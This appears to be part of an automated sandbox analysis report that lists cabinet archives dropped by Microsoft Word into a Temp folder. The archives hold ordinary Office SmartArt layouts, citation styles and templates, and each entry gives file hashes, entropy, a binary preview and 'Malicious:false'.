                                    Preview:MSCF............D................................?..................................pictureorgchart.glox.................Content.inf.W..y....[.............../.jC....U.CUUUTU.5...jjPU..MP....T..0*....o0.......Y.=....P.({.3.p..."pA!>r../3.q..7...........!...TO....(..%......6...3E?....~......CZmndse.Qy....p....h....=.:5...F..%.E.&.v.`I~. ..%._..b]..Y..Q..R.........nN.q8c..a..L..X/.M...PP.q..SpZ.K]>D"Pf..B.c....0..|I.Q.,.g/..Kev.../..=......w..}3.....(....+#T.....K`N.u..Z.....rriK.(...(...6.<R.%.]..NX..b..].C.u....++......Ia.x. .7....J.#............w>....7..R...H>....@%....~.yA.......~.UB..*. .P..$...-...v.....=M."....hw..b....{.....2pR....].C..u@=G."Y..;..gc/N.N.YB.Z.q.#....$....j.D.*.P..!.)S.{..c....&'E.lJ%.|O.a...FG.|.....A..h.=c7.)d.5...D...L...IQ..TTE.*NL-.*M..>..p0.`......m..,.w#rZ..wR\@.Wn..@Q...}..&...E...0K.NY....M.71..`.M./:.>..._L..m...,U.l....._fi...nj9..,..w.s.kJ.m.s.M.vmw.!.....B.s.%.-').h.....)c.l....F..`3r...-.....0..7..&N.....n.#H...<7

                                    C:\Users\user\AppData\Local\Temp\cab9B2F.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 6005 bytes, 2 files, at 0x44 "HexagonRadial.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):22149
                                    Entropy (8bit):7.659898883631361
                                    Encrypted:false
                                    SSDEEP:384:b98FG/zdCbf7BOEawSi8E0GftpBjEPTFPxFLrHRN7S5ll7PK/pA2:N/zAbDae8Pi6PFPSRIA2
                                    MD5:66C5199CF4FB18BD4F9F3F2CCB074007
                                    SHA1:BA9D8765FFC938549CC19B69B3BF5E6522FB062E
                                    SHA-256:4A7DC4ED098E580C8D623C51B57C0BC1D601C45F40B60F39BBA5F063377C3C1F
                                    SHA-512:94C434A131CDE47CB64BCD2FB8AF442482F8ECFA63D958C832ECA935DEB10D360034EF497E2EBB720C72B4C1D7A1130A64811D362054E1D52A441B91C46034B0
                                    Malicious:false
                                    Preview:MSCF....u.......D...........................u....?..................................HexagonRadial.glox.................Content.inf.........[.....`........./.mT.T6...CP..z5...0.PcUmCUSUCU.Q.P.0..f............^...H..2e.[..8...ld......*F.%.j.w!R..NA.L............ .r..z....$&.........P.=.r...O...e..dfv_.i%.C....^......?..x...+d..].B.3..EU...|Cc..z.`lQp..fr.....8!;.8.p.ZwH\.........~..T.t..]..H.]..S.2..Vt.....r.H../..-8........!:.Y&..|A..J.U...-.%..k..U...4m.. .q../..b.8.vc~......_q1.?..Bh.v.....L..I.$I..s.".u.. Y....I^5.v...3.......].^)b.t.j...=...Ze~.O...|.}T.._9c........L....BV.^......X..?.....{.>.j..5.m...d.7........g[..f.nST...i..t..|.T.jjS..4p.Pxu..*..W...|.A)..|9;....H.e.^.8D..S...M..Lj.|...M.m+..H.....8.&-....=.L.....n.v..M.9...l....=r......K.F.j.(.(xD.3..r'9.K..-...5..Z..x....._....a[...J...`.b_a\\j.ed..\.3.5....S.T...ms.....E...Xl.y.LH=...}..0.T...04.4..B[..H.....B{B9.h..=.8Mn.*.TL.c..y.s.?.c9$l...).h).6..;.X../_>Pl...O...U.R..v.dy$A

                                    C:\Users\user\AppData\Local\Temp\cab9B30.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):21111
                                    Entropy (8bit):7.6297992466897675
                                    Encrypted:false
                                    SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                    MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                    SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                    SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                    SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                    Malicious:false
                                    Preview:MSCF....g.......D...........................g....?..........}.......................TabList.glox.................Content.inf....t....[......@..C...../.U5...........6...`.....T..>3.................=..09`..t......a..Y..BI.Z....=.'0...%...T..........H...>.:A.r......n..p...Pf.h...I.8... ....M.]&.#.vv'.....[c......g....>"......<c..f....i...sb!Z..iu<.%|......q.....G28.h-...7.....W.v...RtdK..F~.0.3.'.e..b7.c......a.3.....a\..]...gp8.+.u/}.w.qF........8.=.=|....\~..S.-q}]0...q.B.H.^J...!...a'.2Tn!..."..%........=.e_-.....{o..%o...a`.w..L.5..r.....e.8...pO..RE.Wgr..b.%.E...O.......8s...E....Um].C..M.....[...H.FZ..4...eZI.$..v.3<]..r....B..............8i......e<.D...Q4.q.^S.....H.b.......r.q..0o.......2..PP,."...JI...xU`.6f..K..Q9.Q..h..t....AI.S6...7............X..`dv..r..S....),7ES....#.....(...\.nh...X.ps%l..F...."<_....q....v........_.e.....P.........|&..fi..4..@..^0..v.]7.......^. ."..}(...w.g.X...=<....p.......L...P..XV....@:....N...Y....

                                    C:\Users\user\AppData\Local\Temp\cab9B31.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31562
                                    Entropy (8bit):7.81640835713744
                                    Encrypted:false
                                    SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                    MD5:1D6F8E73A0662A48D332090A4C8C898F
                                    SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                    SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                    SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                    Malicious:false
                                    Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.

                                    C:\Users\user\AppData\Local\Temp\cab9B32.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):21875
                                    Entropy (8bit):7.6559132103953305
                                    Encrypted:false
                                    SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                    MD5:E532038762503FFA1371DF03FA2E222D
                                    SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                    SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                    SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                    Malicious:false
                                    Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)

                                    C:\Users\user\AppData\Local\Temp\cab9B33.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):28911
                                    Entropy (8bit):7.7784119983764715
                                    Encrypted:false
                                    SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                    MD5:6D787B1E223DB6B91B69238062CCA872
                                    SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                    SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                    SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                    Malicious:false
                                    Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.

                                    C:\Users\user\AppData\Local\Temp\cab9B34.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):30957
                                    Entropy (8bit):7.808231503692675
                                    Encrypted:false
                                    SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                    MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                    SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                    SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                    SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                    Malicious:false
                                    Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F

                                    C:\Users\user\AppData\Local\Temp\cab9B35.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31083
                                    Entropy (8bit):7.814202819173796
                                    Encrypted:false
                                    SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                    MD5:89A9818E6658D73A73B642522FF8701F
                                    SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                    SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                    SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                    Malicious:false
                                    Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........

                                    C:\Users\user\AppData\Local\Temp\cab9B89.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):46413
                                    Entropy (8bit):7.9071408623961394
                                    Encrypted:false
                                    SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                    MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                    SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                    SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                    SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                    Malicious:false
                                    Preview:MSCF....=v......L...........................=v...?..................5u......................Text Sidebar (Annual Report Red and Black design).docx.v...............Content.inf..C,.zd..[............... .w.....b...wwww]r..W\ww...... .hh...........o.nz.....Ku.7..-.oH...h;.N..#.._.D,}......!Q$..Un.tI11..$w.r3... ..p...=.1....""..n...*/....h.A...Y..c,.Q.,......",..b.1.w..$.....l../;..J.....~.. ....+.R#....7.-..1.x.feH.@.......u...(.DQ%.wL.N|.xh...R..#....C...'X.m.....I{W.....5.C.....\....z.Y.)w..i...%....M..n.p.....{..-G9..k.bT.6........7....).....6..ys.....R.e.....0.Xk`.3..X\xL..4J"#.f...:....r..2..Y.uW..052.n.+ ..o..o..f&u.v.&9y.P..6.K..in.DU.#.~....4i..6;.5.w..i...g.(....../..0*Vh...C..//....W..:w......7.6....]....4.*9...sL.0k...zHh..2N.H...*..]..(.x.:..........Y.+...-.....&.*^..Q.sW...v..w.....k.L.e.^.W4iFS..u.....l.g'...b~:Zm...S.2.|......5S..=.............l.../|....G|.9 ..#.q...W.Q...G=.."W..'.6....I....D._.{.g.47....V.1._..<?....m............)..T.

                                    C:\Users\user\AppData\Local\Temp\cab9B8A.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31008
                                    Entropy (8bit):7.806058951525675
                                    Encrypted:false
                                    SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                    MD5:E033CCBC7BA787A2F824CE0952E57D44
                                    SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                    SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                    SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                    Malicious:false
                                    Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..

                                    C:\Users\user\AppData\Local\Temp\cab9B8B.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):31605
                                    Entropy (8bit):7.820497014278096
                                    Encrypted:false
                                    SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                    MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                    SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                    SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                    SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                    Malicious:false
                                    Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....

                                    C:\Users\user\AppData\Local\Temp\cab9B8C.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):43653
                                    Entropy (8bit):7.899157106666598
                                    Encrypted:false
                                    SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                    MD5:DA3380458170E60CBEA72602FDD0D955
                                    SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                    SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                    SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                    Malicious:false
                                    Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.

                                    C:\Users\user\AppData\Local\Temp\cab9C2C.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):42788
                                    Entropy (8bit):7.89307894056
                                    Encrypted:false
                                    SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                    MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                    SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                    SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                    SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                    Malicious:false
                                    Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......

                                    C:\Users\user\AppData\Local\Temp\cab9C40.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                    Category:dropped
                                    Size (bytes):20554
                                    Entropy (8bit):7.612044504501488
                                    Encrypted:false
                                    SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                    MD5:486CBCB223B873132FFAF4B8AD0AD044
                                    SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                    SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                    SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                    Malicious:false
